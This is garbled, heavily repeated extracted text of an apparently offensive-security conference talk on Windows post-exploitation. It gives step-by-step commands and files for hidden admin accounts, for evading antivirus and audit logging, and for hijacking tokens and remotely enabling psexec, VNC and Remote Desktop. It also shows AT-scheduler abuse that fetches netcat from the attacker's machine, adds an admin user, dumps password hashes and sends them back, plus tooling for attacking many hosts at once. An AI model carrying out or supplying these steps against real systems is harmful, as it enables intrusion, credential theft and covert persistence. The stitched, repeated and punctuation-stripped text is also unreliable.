- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
